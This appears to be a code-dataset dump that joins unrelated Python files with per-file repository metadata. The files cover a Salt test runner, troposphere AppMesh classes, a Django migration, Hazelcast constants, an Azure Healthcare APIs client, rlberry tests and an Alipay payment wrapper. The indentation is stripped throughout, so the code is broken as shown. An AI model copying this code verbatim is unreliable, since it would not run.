# We are not explicitly running the unit tests and none of the
# names passed to --name (or derived via --from-filenames) is a
# unit test.
return [True]
status = []
if self.options.unit:
# MacOS needs more open filehandles for running unit test suite
self.set_filehandle_limits('unit')
results = self.run_suite(
os.path.join(TEST_DIR, 'unit'), 'Unit', suffix='test_*.py',
failfast=self.options.failfast,
)
status.append(results)
# We executed ALL unittests, we can skip running unittests by name
# below
return status
for name in named_unit_test:
results = self.run_suite(
os.path.join(TEST_DIR, 'unit'), name, suffix='test_*.py',
load_from_name=True, failfast=self.options.failfast,
)
status.append(results)
return status
def run_kitchen_tests(self):
'''
Execute the kitchen tests
'''
named_kitchen_test = []
if self.options.name:
for test in self.options.name:
if not test.startswith(('tests.kitchen.', 'kitchen.')):
continue
named_kitchen_test.append(test)
if not self.options.kitchen and not named_kitchen_test:
# We are not explicitly running the unit tests and none of the
# names passed to --name is a unit test.
return [True]
status = []
if self.options.kitchen:
results = self.run_suite(
os.path.join(TEST_DIR, 'kitchen'), 'Kitchen', suffix='test_*.py'
)
status.append(results)
# We executed ALL unittests, we can skip running unittests by name
# below
return status
for name in named_kitchen_test:
results = self.run_suite(
os.path.join(TEST_DIR, 'kitchen'), name, suffix='test_*.py', load_from_name=True
)
status.append(results)
return status
def main(**kwargs):
'''
Parse command line options for running specific tests
'''
try:
parser = SaltTestsuiteParser(
TEST_DIR,
xml_output_dir=XML_OUTPUT_DIR,
tests_logfile=os.path.join(SYS_TMP_DIR, 'salt-runtests.log')
)
parser.parse_args()
# Override parser options (helpful when importing runtests.py and
# running from within a REPL). Using kwargs.items() to avoid importing
# six, as this feature will rarely be used.
for key, val in kwargs.items():
setattr(parser.options, key, val)
overall_status = []
if parser.options.interactive:
if parser.options.multimaster:
parser.start_multimaster_daemons_only()
else:
parser.start_daemons_only()
status = parser.run_integration_tests()
overall_status.extend(status)
status = parser.run_multimaster_tests()
overall_status.extend(status)
status = parser.run_unit_tests()
overall_status.extend(status)
status = parser.run_kitchen_tests()
overall_status.extend(status)
false_count = overall_status.count(False)
if false_count > 0:
parser.finalize(1)
parser.finalize(0)
except KeyboardInterrupt:
print('\nCaught keyboard interrupt. Exiting.\n')
exit(0)
if __name__ == '__main__':
main()
| 37.022556
| 117
| 0.533255
|
3ff6cd87cb9e80b3f94ee84a92f89bf46287c92b
| 4,912
|
py
|
Python
|
troposphere/appmesh.py
|
sivakarthick169/troposphere
|
ddf147e9a7d62b9d43ac98c4c5926cf8ccd66cf1
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/appmesh.py
|
sivakarthick169/troposphere
|
ddf147e9a7d62b9d43ac98c4c5926cf8ccd66cf1
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/appmesh.py
|
sivakarthick169/troposphere
|
ddf147e9a7d62b9d43ac98c4c5926cf8ccd66cf1
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2012-2019, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSObject, AWSProperty, Tags
from .validators import integer
class VirtualNodeServiceProvider(AWSProperty):
props = {
'VirtualNodeName': (basestring, True),
}
class VirtualRouterServiceProvider(AWSProperty):
props = {
'VirtualRouterName': (basestring, True),
}
class VirtualServiceProvider(AWSProperty):
props = {
'VirtualNode': (VirtualNodeServiceProvider, False),
'VirtualRouter': (VirtualRouterServiceProvider, False),
}
class VirtualServiceSpec(AWSProperty):
props = {
'Provider': (VirtualServiceProvider, False),
}
class TagRef(AWSProperty):
props = {
'Key': (basestring, True),
'Value': (basestring, False),
}
class VirtualService(AWSObject):
resource_type = "AWS::AppMesh::VirtualService"
props = {
'MeshName': (basestring, True),
'Spec': (VirtualServiceSpec, True),
'Tags': ([TagRef], False),
'VirtualServiceName': (basestring, True),
}
class HealthCheck(AWSProperty):
props = {
'HealthyThreshold': (integer, True),
'IntervalMillis': (integer, True),
'Path': (basestring, False),
'Port': (integer, False),
'Protocol': (basestring, True),
'TimeoutMillis': (integer, True),
'UnhealthyThreshold': (integer, True),
}
class PortMapping(AWSProperty):
props = {
'Port': (integer, True),
'Protocol': (basestring, True),
}
class Listener(AWSProperty):
props = {
'HealthCheck': (HealthCheck, False),
'PortMapping': (PortMapping, True),
}
class DnsServiceDiscovery(AWSProperty):
props = {
'Hostname': (basestring, True),
}
class ServiceDiscovery(AWSProperty):
props = {
'DNS': (DnsServiceDiscovery, True),
}
class FileAccessLog(AWSProperty):
props = {
'Path': (basestring, True),
}
class AccessLog(AWSProperty):
props = {
'File': (FileAccessLog, False),
}
class Logging(AWSProperty):
props = {
'AccessLog': (AccessLog, False),
}
class VirtualServiceBackend(AWSProperty):
props = {
'VirtualServiceName': (basestring, True),
}
class Backend(AWSProperty):
props = {
'VirtualService': (VirtualServiceBackend, False),
}
class VirtualNodeSpec(AWSProperty):
props = {
'Backends': ([Backend], False),
'Listeners': ([Listener], False),
'Logging': (Logging, False),
'ServiceDiscovery': (ServiceDiscovery, False),
}
class VirtualNode(AWSObject):
resource_type = "AWS::AppMesh::VirtualNode"
props = {
'MeshName': (basestring, True),
'Spec': (VirtualNodeSpec, True),
'Tags': ([TagRef], False),
'VirtualNodeName': (basestring, True),
}
class WeightedTarget(AWSProperty):
props = {
'VirtualNode': (basestring, True),
'Weight': (integer, True),
}
class HttpRouteAction(AWSProperty):
props = {
'WeightedTargets': ([WeightedTarget], True),
}
class HttpRouteMatch(AWSProperty):
props = {
'Prefix': (basestring, True),
}
class HttpRoute(AWSProperty):
props = {
'Action': (HttpRouteAction, True),
'Match': (HttpRouteMatch, True),
}
class TcpRouteAction(AWSProperty):
props = {
'WeightedTargets': ([WeightedTarget], True),
}
class TcpRoute(AWSProperty):
props = {
'Action': (TcpRouteAction, True),
}
class RouteSpec(AWSProperty):
props = {
'HttpRoute': (HttpRoute, False),
'TcpRoute': (TcpRoute, False),
}
class Route(AWSObject):
resource_type = "AWS::AppMesh::Route"
props = {
'MeshName': (basestring, True),
'RouteName': (basestring, True),
'Spec': (RouteSpec, True),
'Tags': ([TagRef], False),
'VirtualRouterName': (basestring, True),
}
class EgressFilter(AWSProperty):
props = {
'Type': (basestring, True),
}
class MeshSpec(AWSProperty):
props = {
'EgressFilter': (EgressFilter, False),
}
class Mesh(AWSObject):
resource_type = "AWS::AppMesh::Mesh"
props = {
'MeshName': (basestring, True),
'Spec': (MeshSpec, False),
'Tags': ([TagRef], False),
}
class VirtualRouterListener(AWSProperty):
props = {
'PortMapping': (PortMapping, True),
}
class VirtualRouterSpec(AWSProperty):
props = {
'Listeners': ([VirtualRouterListener], True),
}
class VirtualRouter(AWSObject):
resource_type = "AWS::AppMesh::VirtualRouter"
props = {
'MeshName': (basestring, True),
'Spec': (VirtualRouterSpec, True),
'Tags': (Tags, False),
'VirtualRouterName': (basestring, True),
}
| 20.381743
| 63
| 0.597109
|
315b518a1e2280f713dcc780d7d4b341f77ab3c4
| 10,118
|
py
|
Python
|
archiv/migrations/0001_initial.py
|
acdh-oeaw/mmp
|
7ef8f33eafd3a7985328d374130f1cbe31f77df0
|
[
"MIT"
] | 2
|
2021-06-02T11:27:54.000Z
|
2021-08-25T10:29:04.000Z
|
archiv/migrations/0001_initial.py
|
acdh-oeaw/mmp
|
7ef8f33eafd3a7985328d374130f1cbe31f77df0
|
[
"MIT"
] | 86
|
2021-01-29T12:31:34.000Z
|
2022-03-28T11:41:04.000Z
|
archiv/migrations/0001_initial.py
|
acdh-oeaw/mmp
|
7ef8f33eafd3a7985328d374130f1cbe31f77df0
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-01-29 10:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('vocabs', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Autor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('name', models.CharField(blank=True, help_text='Name (de)', max_length=250, verbose_name='Name (de)')),
('name_lat', models.CharField(blank=True, help_text='Name (lat)', max_length=250, verbose_name='Name (lat)')),
('name_en', models.CharField(blank=True, help_text='Name (en)', max_length=250, verbose_name='Name (en)')),
('name_fr', models.CharField(blank=True, help_text='Name (fr)', max_length=250, verbose_name='Name (fr)')),
('name_it', models.CharField(blank=True, help_text='Name (it)', max_length=250, verbose_name='Name (it)')),
('jahrhundert', models.CharField(blank=True, help_text='Jahrhundert', max_length=250, verbose_name='Jahrundert')),
('start_date', models.CharField(blank=True, help_text='von', max_length=250, verbose_name='von')),
('end_date', models.CharField(blank=True, help_text='bis', max_length=250, verbose_name='bis')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
],
options={
'verbose_name': 'Autor',
'ordering': ['legacy_pk'],
},
),
migrations.CreateModel(
name='Edition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('zitat', models.CharField(blank=True, help_text='Zitat', max_length=250, verbose_name='Zitat')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
],
options={
'verbose_name': 'Edition',
'ordering': ['zitat'],
},
),
migrations.CreateModel(
name='KeyWord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('stichwort', models.CharField(blank=True, help_text='Stichwort', max_length=250, verbose_name='Stichwort')),
('art', models.CharField(blank=True, help_text='Art des Stichworts', max_length=250, verbose_name='Art des Stichworts')),
('varianten', models.TextField(blank=True, help_text="Varianten, bitte mit ';' trennen", null=True, verbose_name='Varianten')),
('wurzel', models.CharField(blank=True, help_text='Wurzel', max_length=250, verbose_name='Wurzel')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
],
options={
'verbose_name': 'Keyword',
'ordering': ['stichwort'],
},
),
migrations.CreateModel(
name='Ort',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('name', models.CharField(blank=True, help_text='Name (en)', max_length=250, verbose_name='Name (en)')),
('name_antik', models.CharField(blank=True, help_text='Name (antik)', max_length=250, verbose_name='Name (antik)')),
('name_de', models.CharField(blank=True, help_text='Name (de)', max_length=250, verbose_name='Name (de)')),
('name_fr', models.CharField(blank=True, help_text='Name (fr)', max_length=250, verbose_name='Name (fr)')),
('name_it', models.CharField(blank=True, help_text='Name (it)', max_length=250, verbose_name='Name (it)')),
('long', models.FloatField(blank=True, help_text='Längengrad', null=True, verbose_name='Längengrad')),
('lat', models.FloatField(blank=True, help_text='Breitengrad', null=True, verbose_name='Breitengrad')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
('art', models.ForeignKey(blank=True, help_text='Art des Ortes', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_ort_art_skosconcept', to='vocabs.skosconcept', verbose_name='Art des Ortes')),
('kategorie', models.ForeignKey(blank=True, help_text='Kategorie des Ortes', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_ort_kategorie_skosconcept', to='vocabs.skosconcept', verbose_name='Kategorie des Ortes')),
],
options={
'verbose_name': 'Ort',
'ordering': ['legacy_pk'],
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('title', models.CharField(blank=True, help_text='Titel', max_length=250, verbose_name='Titel')),
('jahrhundert', models.CharField(blank=True, help_text='Jahrhundert', max_length=250, verbose_name='Jahrundert')),
('start_date', models.CharField(blank=True, help_text='von', max_length=250, verbose_name='von')),
('end_date', models.CharField(blank=True, help_text='bis', max_length=250, verbose_name='bis')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
('art', models.ForeignKey(blank=True, help_text='Textart', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_text_art_skosconcept', to='vocabs.skosconcept', verbose_name='Textart')),
('autor', models.ManyToManyField(blank=True, help_text='Autor', related_name='rvn_text_autor_autor', to='archiv.Autor', verbose_name='Autor')),
('edition', models.ManyToManyField(blank=True, help_text='Edition', related_name='rvn_text_edition_edition', to='archiv.Edition', verbose_name='Edition')),
('ort', models.ManyToManyField(blank=True, help_text='Ort', related_name='rvn_text_ort_ort', to='archiv.Ort', verbose_name='Ort')),
],
options={
'verbose_name': 'Text',
'ordering': ['title'],
},
),
migrations.CreateModel(
name='Stelle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('summary', models.TextField(blank=True, help_text='Zusammenfassung', null=True, verbose_name='Zusammenfassung')),
('zitat', models.TextField(blank=True, help_text='Zitat', null=True, verbose_name='Zitat')),
('translation', models.TextField(blank=True, help_text='Übersetzung', null=True, verbose_name='Übersetzung')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
('key_word', models.ManyToManyField(blank=True, help_text='Stichwort', related_name='rvn_stelle_key_word_keyword', to='archiv.KeyWord', verbose_name='Stichwort')),
('text', models.ForeignKey(blank=True, help_text='Text', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_stelle_text_text', to='archiv.text', verbose_name='Text')),
],
options={
'verbose_name': 'Stelle',
'ordering': ['legacy_pk'],
},
),
migrations.AddField(
model_name='autor',
name='ort',
field=models.ForeignKey(blank=True, help_text='Ort', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_autor_ort_ort', to='archiv.ort', verbose_name='Ort'),
),
]
| 72.791367
| 258
| 0.622752
|
b076165febf01a27a3eafa5fac980daea882bf7f
| 397
|
py
|
Python
|
hazelcast/protocol/codec/atomic_long_message_type.py
|
buraksezer/hazelcast-python-client
|
4cc593ef7de994bd84fdac8331b81b309cce30a0
|
[
"Apache-2.0"
] | 3
|
2020-05-01T15:01:54.000Z
|
2021-01-27T14:51:45.000Z
|
hazelcast/protocol/codec/atomic_long_message_type.py
|
buraksezer/hazelcast-python-client
|
4cc593ef7de994bd84fdac8331b81b309cce30a0
|
[
"Apache-2.0"
] | null | null | null |
hazelcast/protocol/codec/atomic_long_message_type.py
|
buraksezer/hazelcast-python-client
|
4cc593ef7de994bd84fdac8331b81b309cce30a0
|
[
"Apache-2.0"
] | 1
|
2020-12-01T20:00:35.000Z
|
2020-12-01T20:00:35.000Z
|
ATOMICLONG_APPLY = 0x0a01
ATOMICLONG_ALTER = 0x0a02
ATOMICLONG_ALTERANDGET = 0x0a03
ATOMICLONG_GETANDALTER = 0x0a04
ATOMICLONG_ADDANDGET = 0x0a05
ATOMICLONG_COMPAREANDSET = 0x0a06
ATOMICLONG_DECREMENTANDGET = 0x0a07
ATOMICLONG_GET = 0x0a08
ATOMICLONG_GETANDADD = 0x0a09
ATOMICLONG_GETANDSET = 0x0a0a
ATOMICLONG_INCREMENTANDGET = 0x0a0b
ATOMICLONG_GETANDINCREMENT = 0x0a0c
ATOMICLONG_SET = 0x0a0d
| 26.466667
| 35
| 0.866499
|
7925f8c6eaecdffbabcbfd6eae03c9fb3d087d5f
| 9,167
|
py
|
Python
|
src/healthcareapis/azext_healthcareapis/vendored_sdks/healthcareapis/aio/operations/_workspace_private_link_resources_operations.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | null | null | null |
src/healthcareapis/azext_healthcareapis/vendored_sdks/healthcareapis/aio/operations/_workspace_private_link_resources_operations.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | null | null | null |
src/healthcareapis/azext_healthcareapis/vendored_sdks/healthcareapis/aio/operations/_workspace_private_link_resources_operations.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | 1
|
2022-02-14T21:43:29.000Z
|
2022-02-14T21:43:29.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WorkspacePrivateLinkResourcesOperations:
"""WorkspacePrivateLinkResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.healthcareapis.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_workspace(
self,
resource_group_name: str,
workspace_name: str,
**kwargs
) -> AsyncIterable["models.PrivateLinkResourceListResultDescription"]:
"""Gets the private link resources that need to be created for a workspace.
:param resource_group_name: The name of the resource group that contains the service instance.
:type resource_group_name: str
:param workspace_name: The name of workspace resource.
:type workspace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PrivateLinkResourceListResultDescription or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.healthcareapis.models.PrivateLinkResourceListResultDescription]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PrivateLinkResourceListResultDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_workspace.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'workspaceName': self._serialize.url("workspace_name", workspace_name, 'str', max_length=24, min_length=3),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PrivateLinkResourceListResultDescription', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorDetails, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_workspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HealthcareApis/workspaces/{workspaceName}/privateLinkResources'} # type: ignore
async def get(
self,
resource_group_name: str,
workspace_name: str,
group_name: str,
**kwargs
) -> "models.PrivateLinkResourceDescription":
"""Gets a private link resource that need to be created for a workspace.
:param resource_group_name: The name of the resource group that contains the service instance.
:type resource_group_name: str
:param workspace_name: The name of workspace resource.
:type workspace_name: str
:param group_name: The name of the private link resource group.
:type group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResourceDescription, or the result of cls(response)
:rtype: ~azure.mgmt.healthcareapis.models.PrivateLinkResourceDescription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PrivateLinkResourceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'workspaceName': self._serialize.url("workspace_name", workspace_name, 'str', max_length=24, min_length=3),
'groupName': self._serialize.url("group_name", group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorDetails, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResourceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HealthcareApis/workspaces/{workspaceName}/privateLinkResources/{groupName}'} # type: ignore
| 50.646409
| 209
| 0.675794
|
c887863553b4a2162ebf12ed95324870669453d7
| 482
|
py
|
Python
|
touroute/tourouteapp/models.py
|
oscarlamasrios/toroute
|
5b00c0f606f438229e7857f25a23c4d51ff34293
|
[
"Apache-2.0"
] | null | null | null |
touroute/tourouteapp/models.py
|
oscarlamasrios/toroute
|
5b00c0f606f438229e7857f25a23c4d51ff34293
|
[
"Apache-2.0"
] | null | null | null |
touroute/tourouteapp/models.py
|
oscarlamasrios/toroute
|
5b00c0f606f438229e7857f25a23c4d51ff34293
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
# Create your models here.
class Route(models.Model):
date = models.DateField(auto_now=False, auto_now_add=True,editable=False)
class Place(models.Model):
name = models.CharField(max_length=30)
lat = models.FloatField()
lon = models.FloatField()
identifier = models.CharField(max_length=30)
class RP(models.Model):
route_id= models.ForeignKey(Route,on_delete=models.CASCADE)
place_id= models.ForeignKey(Place,on_delete=models.CASCADE)
| 30.125
| 75
| 0.773859
|
9114c8347cee48ea6ff0dba61b406d77bf3e6759
| 2,930
|
py
|
Python
|
third_part/alipay_dual/alipay_api.py
|
wangdiwen/Alipay_Python_API
|
b5821ffc9f99b8fb4b22c2bf956ac704571524d5
|
[
"MIT"
] | 15
|
2015-01-13T13:55:32.000Z
|
2021-05-16T03:01:50.000Z
|
third_part/alipay_dual/alipay_api.py
|
wangdiwen/Alipay_Python_API
|
b5821ffc9f99b8fb4b22c2bf956ac704571524d5
|
[
"MIT"
] | null | null | null |
third_part/alipay_dual/alipay_api.py
|
wangdiwen/Alipay_Python_API
|
b5821ffc9f99b8fb4b22c2bf956ac704571524d5
|
[
"MIT"
] | 2
|
2015-04-15T16:48:21.000Z
|
2015-08-23T03:24:37.000Z
|
#!/usr/bin/env python
#coding=utf-8
# Note:
# 支付宝 双功能 API
from alipay_config import *
from alipay_submit import *
from alipay_notify import *
class Alipay_API:
payment_type = "1" # 支付类型
return_url = "http://192.168.1.199:8000/dual/return" # 页面跳转同步通知页面路径
notify_url = "http://192.168.1.199:8000/dual/notify" # 服务器异步通知页面路径
seller_email = '' # 卖家支付宝帐户
anti_phishing_key = "" # 防钓鱼时间戳
exter_invoke_ip = "" # 客户端的IP地址
alipay_config = ''
def __init__(self):
alipay_config = Alipay_Config()
self.seller_email = alipay_config.seller_email
self.partner = alipay_config.partner
self.key = alipay_config.key
self.sign_type = alipay_config.sign_type
self.input_charset = alipay_config.input_charset
self.cacert = alipay_config.cacert
self.transport = alipay_config.transport
# out_trade_no: 商户订单号, 商户网站订单系统中唯一订单号,必填
# subject: 订单名称
# price: 付款金额
# quantity: 商品数量,必填,建议默认为1,不改变值,把一次交易看成是一次下订单而非购买一件商品
# logistics_fee: 物流费用
# logistics_type: 物流类型, 必填,三个值可选:EXPRESS(快递)、POST(平邮)、EMS(EMS)
# logistics_payment: 物流支付方式, 必填,两个值可选:SELLER_PAY(卖家承担运费)、BUYER_PAY(买家承担运费)
# body: 订单描述
# show_url: 商品展示地址, 需以http://开头的完整路径
# receive_name: 收货人姓名
# receive_address: 收货人地址
# receive_zip: 收货人邮编
# receive_phone: 收货人电话号码
# receive_mobile: 收货人手机号码
def alipay_submit(self, out_trade_no, subject, price, \
quantity, logistics_fee, logistics_type, logistics_payment, \
body, show_url, \
receive_name, receive_address, receive_zip, receive_phone, receive_mobile):
parameter = {
'service': "trade_create_by_buyer",
'partner': self.partner,
'payment_type': Alipay_API.payment_type,
'notify_url': Alipay_API.notify_url,
'return_url': Alipay_API.return_url,
'seller_email': self.seller_email,
'out_trade_no': out_trade_no,
'subject': subject,
'price': price,
'quantity': quantity,
'logistics_fee': logistics_fee,
'logistics_type': logistics_type,
'logistics_payment': logistics_payment,
'body': body,
'show_url': show_url,
'receive_name': receive_name,
'receive_address': receive_address,
'receive_zip': receive_zip,
'receive_phone': receive_phone,
'receive_mobile': receive_mobile,
'_input_charset': self.input_charset,
}
submit = AlipaySubmit()
html_text = submit.buildRequestForm(parameter, 'get', '确定')
return html_text
def get_notify(self):
notify = AlipayNotify()
return notify.verifyReturn() # True/False
| 34.069767
| 103
| 0.606826
|
6428d9379d8adf54673630e85f9714cca0aa2eee
| 1,014
|
py
|
Python
|
rlberry/agents/tests/test_torch_models.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/tests/test_torch_models.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/tests/test_torch_models.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
"""
TODO: Test attention modules
"""
import torch
from rlberry.agents.utils.torch_models import MultiLayerPerceptron
from rlberry.agents.utils.torch_models import ConvolutionalNetwork
from rlberry.agents.utils.torch_attention_models import EgoAttention
from rlberry.agents.utils.torch_attention_models import SelfAttention
def test_mlp():
model = MultiLayerPerceptron(in_size=5,
layer_sizes=[10, 10, 10],
out_size=10,
reshape=False)
x = torch.rand(1, 5)
y = model.forward(x)
assert y.shape[1] == 10
def test_cnn():
model = ConvolutionalNetwork(in_channels=10,
in_height=20,
in_width=30,
out_size=15)
x = torch.rand(1, 10, 20, 30)
y = model.forward(x)
assert y.shape[1] == 15
def test_ego_attention():
_ = EgoAttention()
def test_self_attention():
_ = SelfAttention()
| 26.684211
| 69
| 0.591716
|
af77dfc9880587e24d4a58108ecae5b3ca7b9a3a
| 3,134
|
py
|
Python
|
爬蟲/cpe_crawler/cpe_crawler/settings.py
|
LuckyPigeon/CPE_Previous_Questions
|
14005407c52922dea28e861e8f591d74da3c3df5
|
[
"MIT"
] | 26
|
2020-10-08T02:44:20.000Z
|
2022-03-25T09:59:31.000Z
|
爬蟲/cpe_crawler/cpe_crawler/settings.py
|
LuckyPigeon/CPE_Previous_Questions
|
14005407c52922dea28e861e8f591d74da3c3df5
|
[
"MIT"
] | 61
|
2020-10-08T17:03:53.000Z
|
2021-06-17T01:05:51.000Z
|
爬蟲/cpe_crawler/cpe_crawler/settings.py
|
LuckyPigeon/CPE_Previous_Questions
|
14005407c52922dea28e861e8f591d74da3c3df5
|
[
"MIT"
] | 27
|
2020-10-04T05:30:23.000Z
|
2021-08-21T15:39:58.000Z
|
